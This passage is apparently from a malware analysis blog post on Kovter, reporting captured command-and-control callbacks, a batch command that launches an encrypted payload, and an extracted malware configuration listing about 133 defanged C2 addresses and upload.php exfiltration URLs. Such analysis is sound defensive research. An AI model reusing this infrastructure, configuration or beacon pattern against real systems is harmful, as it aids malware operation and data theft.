start "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\1354e279\c3046d01.e5782001b"

The file that is being called in the batch file looks to be an encrypted file of sorts.

From the network side, the malware seems to be pretty straight forward. Once the files have been downloaded from the Powershell script and have been executed, we can see the POST callbacks to a couple of different IP addresses.

POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 1103
Connection: Keep-Alive

ZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21&uunC=%07AT%95w%25%CE%5C%A9%186%CD%C0%9E%5D%1E%8Es%B2%98%DDS%96%BDx%1F%0E%1E%C3%DF%3CI%DA%E6%9E%E5%01%CA%3E%1D%E9I%E07%2CN%90%83&rhjQSF=.%D60%D1%9At%9FC%E1%1FA%14%5D%ED%B0&IwVFWpRk=%FF9v%C5%D0%067%AB%A4kN%AD%F4%FA%18i&nFzv=1%90%0Ap%3Fw%14%85-%FB%BDg%95-%02%22&yndZOvyk=s%D4%FBK%9F%26%26%7Es%FA%89%0F%29G%AF%BD%1Fe%1F%F0%DBB%3F%C962%A9%D1%80e%7C&lWdL=%89%DE%1BG%07%EA%B8%F6Q%21%DEH%7D%9F%D6L%92%C1%A1%0AC%B1%23%7C%8B%83%BA%AD%EF%8C%D8%BA%19%0B%CBYyT%89%80&lIRiyP=%80%AD%90%CCI%E6%9CP%F5i%04Z%C1Lb%01y%C9%C0%3F2%25%D8D%E9%E2%86%2C%AAsg%EDI%CA%84T78%9F%AB%1B%A3%C4%EF%CD%21&IzGlUb=%A6Q%28%C7%5B9F%03%90%0E%C6%1C%E2%F1%F1%1Cr1M%7B%FF%13%8F%92%D5%3E%3CL%D8Y%BB%BF3%5D%7F%BD%ED%EDp%B3d%8C&dPz=%A4x%91o%D50%7D%26%99%01%F3%8En%B4%BB%90r%18%F1%93%16%BA%E7%FB%E2%97%95%8C%B8%1A%3E2+%DCS%E0%9B&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD&LZNBvnt=%83f%27%29%0Ag%5D%1Dg%A5%DC%2C%C1%0C%3B%01%09%AC%D8%7F%3F%3C%B88f%E3%11%C0%60%CE%8D%9F0%95Pk%91&bNZLk=%8F%A8_%C6%D5%10%C2%91%E3%EA%9B%5EsH%C6CT%A7%00%7F&dItZlk=%B6%F7%8E%14%83%A9%83%B0%ABgM

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:30 GMT
Content-Type: application/octet-stream
Content-Length: 373
Connection: keep-alive

Q"..<m..Xr5..g.MR.;...!....]...lu..B7.u.K.C....l&......zPl.Ve.....+.G......._....<...;E..${E.{Q	.. .....0.zc...r.....P
.vy.j.qJ.L......@{,..A.'........Pj.f}3.=:......'	8........2.k..E.".m`..5r....	..x.D..6F......D..I..W.....l.{.	.2w^.C4X.P.;.PP^V7.y.N.....Z......T..]m....8...#..,.ho..)..$...	...y...3RH|#R..	@t......d.....Hr.]....H.th$..c.Yt.x^.$7}.?.Dg.-....tykf.......&

-----

/POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 690
Connection: Keep-Alive

SIyTD=%3E%E9%90%D6%BAh-%93%60C%D5%FC%DA%7C%B9%00&SjAVD=%BE%21%D9s%B6%D8%13U%5C%B3%CC%B8S%F9%F9FXO%8E%076%C7&FqiGQdBN=%2F%88B%A4%D9lo%BA%D6%06%1ER%CC%16H%E0%2F%E3%A2%BE%91%2F%BB%3C%D8%AA%05%91%B3xy%F9%B1&cXlYLNr=%7C%CE%C0%C9%5E%C4%DByY%BC%B2%2B%9C%BC%8B%BA%E9V%D7%D7%7E%5B%F8g%063%3C%F6F%1B%40C9%F0%5CI&KXLjATwr=%18y%E0%1F4%A3%2A%DB%06%14%7C%B6t%AF%15g%F5%C2D%F5%F1%BAC%DE%0F%80B%CF%D8%FB%8F%1C%C4%92%19%D0&sEREwsM=%86C%E2%B6%95%F9%CEK%0B%1F%1FT%97%3D%FBb%5C%8B%27Vq%99%94%D03j%81%E1B%8F%1F2%0A%A3%D0SB%BD&TEZc=P%7E%D5%0F%D3%92%B3%17%96%0A%A9%00%94%AB%86%DFp%9B%D8%13%98%C6E%8A%0Eq%05%1E%BFw%E1%0A%D6%A9%D6%B3%F5&ahXmRSFz=%5E%C1mAf%1A%29%99%B6%E9%8C%D9%AA%0D%DB%1E%8A%5Dtg%B8%D37OS%C2%83%F7L

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:31 GMT
Content-Type: application/octet-stream
Content-Length: 1074
Connection: keep-alive

...a.n...[p..........f....z.@]..(=.~...X..Y)c.......C.x.n]j.)..........\.......(..s.........K.N..:...Y.c..Y..e....F..3I.k.z.....~...

-----

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 128[.]1[.]191[.]207
Content-Length: 472
Cache-Control: no-cache

JmwW3JA7UCEHHPM2MrS0nEz+ws7Z4gp6fZB4a79ARwr7p25dRmYz3EJYxn7vHsYlIuXGtijSuctDBxhvdOGEME+lttPV5RM8+awTwL4orbm4RsuyxUnzbflw2D+TguM62A4mCVujKnO4jAMHXSJTCzDGEXJjnaAwuI5Cctd7db5OXwKIm2b8gDDaglUOE7Ndw4hA/WQomcVsIAYAFOLjrABReSiXQZB6reI+YpUfUGyFNMshy8tF4MD86Lrv6unosp1hQHdx3ojHO5B0d98TtSGOBViWWnmuGUo6GnIDOfF2Ge1cEgP3jUE9I+b5dWnMC4c+3vuF/5zOvr5cogaw4fx7LehP1os5sf7mpbSsi5mYWuqgxnES1Z6qk2OgPDLGq6OyZ+Qa4DaGM/nANLA3rNOvYO51WE7KdF8ze2AYgrE2NeO/+7AIhMIlXkStX5igAnd+ph9yYIWtm3dsY9Vl5w==

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 03 Feb 2017 08:50:55 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

-----

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 104[.]247[.]149[.]240
Content-Length: 452
Cache-Control: no-cache

d25A25FqWGqzdkND5TCryGWbNsWcd08JBGFDNKTFfQ7K9hgM43RuwLkP+htLhcmMdwSS+VRtiDprb67iwET1c0zGXK8scYQGJ0ni289fcN52qe8FsyqHJnH7u3CAG6o3MzmJBIoILYnLUTKo0aEwH2R9PWE5gVrUjx8SjYaTnr0BJlvYKRNmUJpqVE/s6iK6UW9Xb0yrbrCw6Bc2jA+bNiN19F36G5MYISj1AkTn/TIz57THvT/R4YaHPHYPV+3TcsmZFpdup9KQ7AvAtksMNbOP5oMxLg8yAOx1hgkruEx7lt/9oSwCFLyQH9V6ZjZuObT4RFm8QZQSXyq19J8oJOajur2AyBE0XTymvyWRPvVpx3o8kaaurX04ChaZm3EdqLrchfJ58uROXM04MOkhln53WbcliGaK9BOXttqjWFUDmtdFho7lq91zW1A/8ghJxUE=

HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Fri, 03 Feb 2017 08:50:58 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://devel[.]highproxies[.]com/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.10.2</center>
</body>
</html>

It is here that we see a callback over HTTPS with a Let’sEncrypt SSL certificate:

........}..X.Ds7.?....zyf..r.....N:lR...tW...../.5...
.....	.
.2.8.......<..............devel.highproxies.com..........
..................]...Y..X.Ds.M)F.Xl......08e-.`..F..i.6. ...a...<E@...h......E.."..>'.A`..........................	...	..	....0...0...........%7..gN*8x........0
.	*.H..
.....0J1.0	..U....US1.0...U.
.
Let's Encrypt1#0!..U....Let's Encrypt Authority X30..
161230090800Z.
170330090800Z0 1.0...U....devel[.]highproxies[.]com0.."0
.	*.H..
..........0..
.......O..M!...C<?;.>..........[.d....|..1....V.%x........C
-......../.af..b..._:.V.8W$.b.a.XX..C......I`.L~.'w....v.pY...9.Q.....V..?9..i.1...r.r.....P...0.*..('t...~.`......=..U.E....OK....9"r...........?!.J...O./Y...}.J....R....7&23.....|.	5I7.EkG.(R.O....Ri.........0...0...U...........0...U.%..0...+.........+.......0...U.......0.0...U......!1u......do..3...J..0...U.#..0....Jjc.}....9..Ee.....0p..+........d0b0/..+.....0..#http://ocsp.int-x3.letsencrypt.org/0/..+.....0..#http://cert.int-x3.letsencrypt.org/0 ..U....0...devel.highproxies.com0....U. ...0..0...g.....0....+..........0..0&..+.........http://cps.letsencrypt.org0....+.......0.....This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at http://letsencrypt.org/repository/0

We can also see in Wireshark’s Conversations pane (see below) that there are attempts to talk to several IP addresses over port 8080 which failed since they never got a response (only 1 packet was sent).

While letting Process Explorer run while I was looking into the Process Monitor logs and other things, I kept seeing the “regsvr.exe” process (PID 1740) constantly connecting to different IP addresses and ports. Since the capture on Wireshark had already finished, I fired up another one and let it capture some of that traffic. This time around I got different IP addresses (except for the one that is using HTTPS), and also different IP addresses trying to talk to port 8080 (see the image below).

Seeing this, I used Strings2 to take a look into the regsvr.exe process to see if there was anything in there that may help give an idea of what the callbacks would be. Piping that out to a text file, I proceeded to look for keywords like “http” (3427 hits) and also “/upload.php” (17 hits). Those hits reflect the following IP addresses.

185[.]117[.]72[.]90
189[.]177[.]220[.]156

The interesting thing here is that there is a block of text that is found when you look for “/upload.php” in Notepad++ which contains 133 different IP addresses along with what, according to this article from PhishMe states, is the configuration file for Kovter along with the updates to patch the system to the latest versions of Flash and .Net Frameworks. **Note: I came across the PhishMe link when looking up the term “nonuldnet32” in Google.

cp1::150[.]219[.]156[.]87:80>59[.]34[.]180[.]235:38232>169[.]136[.]157[.]237:80>62[.]220[.]112[.]204:443>18[.]56[.]29[.]198:80>218[.]216[.]127[.]77:80>21[.]41[.]239[.]107:80>100[.]166[.]63[.]24:80>106[.]192[.]26[.]7:80>195[.]69[.]139[.]52:443>243[.]69[.]73[.]16:80>137[.]234[.]227[.]8:80>55[.]29[.]95[.]39:80>125[.]138[.]46[.]188:80>191[.]38[.]99[.]216:443>17[.]155[.]112[.]156:80>129[.]143[.]21[.]202:8080>32[.]84[.]137[.]4:443>191[.]59[.]120[.]31:80>255[.]155[.]235[.]46:80>141[.]236[.]125[.]239:80>169[.]1[.]96[.]26:443>48[.]155[.]43[.]68:443>202[.]100[.]184[.]83:80>20[.]19[.]162[.]140:80>3[.]140[.]205[.]238:80>37[.]123[.]165[.]161:443>106[.]74[.]107[.]202:80>8[.]249[.]254[.]51:80>99[.]252[.]161[.]28:80>9[.]48[.]98[.]170:80>147[.]173[.]72[.]96:443>1[.]132[.]22[.]166:443>129[.]16[.]111[.]236:80>210[.]243[.]212[.]209:8080>18[.]53[.]35[.]179:80>114[.]187[.]128[.]212:80>60[.]103[.]18[.]131:80>172[.]132[.]76[.]194:443>113[.]67[.]58[.]224:80>20[.]179[.]35[.]232:80>73[.]249[.]184[.]108:80>9[.]222[.]103[.]137:443>204[.]197[.]26[.]221:443>224[.]138[.]203[.]45:80>244[.]157[.]143[.]47:80>190[.]67[.]48[.]224:80>180[.]42[.]36[.]109:80>208[.]118[.]116[.]55:80>4[.]195[.]63[.]225:25900>32[.]107[.]214[.]76:80>203[.]233[.]71[.]250:443>6[.]61[.]150[.]230:80>75[.]16[.]138[.]183:80>90[.]45[.]25[.]145:443>63[.]149[.]238[.]126:80>249[.]158[.]225[.]208:80>156[.]211[.]224[.]150:43912>229[.]210[.]208[.]203:80>27[.]219[.]195[.]210:80>30[.]255[.]153[.]175:80>216[.]69[.]26[.]86:80>182[.]180[.]65[.]173:443>197[.]45[.]165[.]116:443>79[.]101[.]37[.]210:80>12[.]25[.]99[.]130:80>50[.]56[.]242[.]72:8080>187[.]108[.]195[.]8:8080>212[.]219[.]93[.]114:443>138[.]4[.]86[.]20:8080>132[.]247[.]145[.]147:443>209[.]159[.]149[.]156:443>202[.]191[.]121[.]100:443>20[.]243[.]155[.]227:443>53[.]128[.]177[.]21:8080>235[.]250[.]233[.]187:80>35[.]214[.]161[.]230:443>34[.]5[.]168[.]186:443>210[.]147[.]248[.]235:443>254[.]220[.]78[.]226:47857>130[.]99[.]108[.]151:443>87[.]145[.]98[.]19:80>133[.]232[.]247[.]107:80>25[.]111[.]58[.]211:80>13[.]102[.]27[.]247:80>205[.]246[.]43[.]28:80>229[.]157[.]60[.]81:8080>180[.]168[.]197[.]23:80>29[.]156[.]163[.]20:443>53[.]44[.]118[.]111:80>123[.]100[.]180[.]115:43893>129[.]105[.]221[.]156:443>194[.]58[.]126[.]20:80>50[.]188[.]52[.]73:80>80[.]228[.]26[.]99:80>143[.]97[.]189[.]141:32240>241[.]174[.]170[.]164:28721>20[.]129[.]203[.]86:80>6[.]211[.]88[.]116:80>20[.]168[.]78[.]137:80>163[.]91[.]30[.]241:27879>174[.]120[.]121[.]230:39788>39[.]144[.]13[.]86:80>142[.]34[.]249[.]209:443>204[.]42[.]154[.]209:80>66[.]32[.]198[.]58:80>105[.]149[.]112[.]90:80>238[.]9[.]247[.]103:80>141[.]127[.]109[.]227:35000>250[.]5[.]29[.]204:80>232[.]245[.]197[.]186:80>8[.]218[.]248[.]66:80>97[.]215[.]155[.]187:80>138[.]196[.]78[.]240:80>173[.]126[.]49[.]27:443>84[.]22[.]102[.]112:80>145[.]89[.]215[.]87:8080>10[.]94[.]237[.]3:80>25[.]100[.]119[.]180:443>206[.]63[.]226[.]28:80>149[.]201[.]173[.]198:80>15[.]26[.]248[.]116:8080>218[.]5[.]226[.]178:80>245[.]187[.]185[.]226:80>90[.]251[.]34[.]209:443>65[.]159[.]238[.]36:443>30[.]184[.]131[.]202:443>103[.]216[.]152[.]95:80>34[.]58[.]82[.]4:80>249[.]167[.]103[.]219:47074>192[.]214[.]135[.]145:80>199[.]48[.]116[.]234:80>163[.]109[.]92[.]34:42753>

cp1cptm::30::cptmkey::a7887cc809cf0d4df17fc5dafd03e4e7::keypass::65537::20717578436666370206990156461786566788132748458910865354994919388630407187082788932551065567891365033974994995141358277530021944793516607142737605543772104350635734672485498640041982499636009940196953103877199811371834197299886690010229547993815721647414299018829914480336700775760032044922438942690008663278856440487164946050309668972730239620373400036156807226902415414689227139343695179004305146177952041410093920067335850237232148134221904306706694425837140102211178161590920721365317540938040383023194954613997204876850415109848188765254167924483000246775174171501733414326729845936854172715365200925796295269097::passdebug::0::debugelg::1::elgdl_sl::0::dl_slb_dll::0::b_dllnonul

http://185[.]117[.]72[.]90/upload2[.]php
nonuldnet32::http://download[.]microsoft[.]com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86[.]exe
dnet32dnet64::http://download[.]microsoft[.]com/download/9/8/6/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64[.]exe
dnet64pshellxp::http://download[.]microsoft[.]com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG[.]exe
pshellxppshellvistax32::http://download[.]microsoft[.]com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6[.]0-KB968930-x86[.]msu
pshellvistax32pshellvistax64::http://download[.]microsoft[.]com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6[.]0-KB968930-x64[.]msu
pshellvistax64pshell2k3x32::http://download[.]microsoft[.]com/download/1/1/7/117FB25C-BB2D-41E1-B01E-0FEB0BC72C30/WindowsServer2003-KB968930-x86-ENG[.]exe
pshell2k3x32pshell2k3x64::http://download[.]microsoft[.]com/download/B/D/9/BD9BB1FF-6609-4B10-9334-6D0C58066AA7/WindowsServer2003-KB968930-x64-ENG[.]exe
pshell2k3x64cl_fv::24::cl_fvfl_fu::http://fpdownload[.]macromedia[.]com/get/flashplayer/current/licensing/win/install_flash_player_24_active_x[.]exe
fl_fumainanti::DD1D:1:DD1DDD2D:1:DD2DDD3D:1:DD3DDD4D:1:DD4DDD5D:0:DD5DDD6D:1:DD6DDD7D:1:DD7DDD8D:1:DD8DDD9D:1:DD9DDD10D:1:DD10DDD11D:0:DD11DDD12D:1:DD12DDD13D:1:DD13DDD14D:1:DD14DDD15D:1:DD15DDD16D:1:DD16DDD17D:0:DD17Dal:http://185[.]117[.]72[.]90/upload.php

And here is the IP addresses cleaned up from the list above. Please note that only a handful of the IP addresses used in the PCAPs are found in the list below:

150[.]219[.]156[.]87:80
59[.]34[.]180[.]235:38232
169[.]136[.]157[.]237:80
62[.]220[.]112[.]204:443
18[.]56[.]29[.]198:80
218[.]216[.]127[.]77:80
21[.]41[.]239[.]107:80
100[.]166[.]63[.]24:80
106[.]192[.]26[.]7:80
195[.]69[.]139[.]52:443
243[.]69[.]73[.]16:80
137[.]234[.]227[.]8:80
55[.]29[.]95[.]39:80
125[.]138[.]46[.]188:80
191[.]38[.]99[.]216:443
17[.]155[.]112[.]156:80
129[.]143[.]21[.]202:8080
32[.]84[.]137[.]4:443
191[.]59[.]120[.]31:80
255[.]155[.]235[.]46:80
141[.]236[.]125[.]239:80
169[.]1[.]96[.]26:443
48[.]155[.]43[.]68:443
202[.]100[.]184[.]83:80
20[.]19[.]162[.]140:80
3[.]140[.]205[.]238:80
37[.]123[.]165[.]161:443
106[.]74[.]107[.]202:80
8[.]249[.]254[.]51:80
99[.]252[.]161[.]28:80
9[.]48[.]98[.]170:80
147[.]173[.]72[.]96:443
1[.]132[.]22[.]166:443
129[.]16[.]111[.]236:80
210[.]243[.]212[.]209:8080
18[.]53[.]35[.]179:80
114[.]187[.]128[.]212:80
60[.]103[.]18[.]131:80
172[.]132[.]76[.]194:443
113[.]67[.]58[.]224:80
20[.]179[.]35[.]232:80
73[.]249[.]184[.]108:80
9[.]222[.]103[.]137:443
204[.]197[.]26[.]221:443
224[.]138[.]203[.]45:80
244[.]157[.]143[.]47:80
190[.]67[.]48[.]224:80
180[.]42[.]36[.]109:80
208[.]118[.]116[.]55:80
4[.]195[.]63[.]225:25900
32[.]107[.]214[.]76:80
203[.]233[.]71[.]250:443
6[.]61[.]150[.]230:80
75[.]16[.]138[.]183:80
90[.]45[.]25[.]145:443
63[.]149[.]238[.]126:80
249[.]158[.]225[.]208:80
156[.]211[.]224[.]150:43912
229[.]210[.]208[.]203:80
27[.]219[.]195[.]210:80
30[.]255[.]153[.]175:80
216[.]69[.]26[.]86:80
182[.]180[.]65[.]173:443
197[.]45[.]165[.]116:443
79[.]101[.]37[.]210:80
12[.]25[.]99[.]130:80
50[.]56[.]242[.]72:8080
187[.]108[.]195[.]8:8080
212[.]219[.]93[.]114:443
138[.]4[.]86[.]20:8080
132[.]247[.]145[.]147:443
209[.]159[.]149[.]156:443
202[.]191[.]121[.]100:443
20[.]243[.]155[.]227:443
53[.]128[.]177[.]21:8080
235[.]250[.]233[.]187:80
35[.]214[.]161[.]230:443
34[.]5[.]168[.]186:443
210[.]147[.]248[.]235:443
254[.]220[.]78[.]226:47857
130[.]99[.]108[.]151:443
87[.]145[.]98[.]19:80
133[.]232[.]247[.]107:80
25[.]111[.]58[.]211:80
13[.]102[.]27[.]247:80
205[.]246[.]43[.]28:80
229[.]157[.]60[.]81:8080
180[.]168[.]197[.]23:80
29[.]156[.]163[.]20:443
53[.]44[.]118[.]111:80
123[.]100[.]180[.]115:43893
129[.]105[.]221[.]156:443
194[.]58[.]126[.]20:80
50[.]188[.]52[.]73:80
80[.]228[.]26[.]99:80
143[.]97[.]189[.]141:32240
241[.]174[.]170[.]164:28721
20[.]129[.]203[.]86:80
6[.]211[.]88[.]116:80
20[.]168[.]78[.]137:80
163[.]91[.]30[.]241:27879
174[.]120[.]121[.]230:39788
39[.]144[.]13[.]86:80
142[.]34[.]249[.]209:443
204[.]42[.]154[.]209:80
66[.]32[.]198[.]58:80
105[.]149[.]112[.]90:80
238[.]9[.]247[.]103:80
141[.]127[.]109[.]227:35000
250[.]5[.]29[.]204:80
232[.]245[.]197[.]186:80
8[.]218[.]248[.]66:80
97[.]215[.]155[.]187:80
138[.]196[.]78[.]240:80
173[.]126[.]49[.]27:443
84[.]22[.]102[.]112:80
145[.]89[.]215[.]87:8080
10[.]94[.]237[.]3:80
25[.]100[.]119[.]180:443
206[.]63[.]226[.]28:80
149[.]201[.]173[.]198:80
15[.]26[.]248[.]116:8080
218[.]5[.]226[.]178:80
245[.]187[.]185[.]226:80
90[.]251[.]34[.]209:443
65[.]159[.]238[.]36:443
30[.]184[.]131[.]202:443
103[.]216[.]152[.]95:80
34[.]58[.]82[.]4:80
249[.]167[.]103[.]219:47074
192[.]214[.]135[.]145:80
199[.]48[.]116[.]234:80
163[.]109[.]92[.]34:42753

Leave a Reply

Your email address will not be published. Required fields are marked *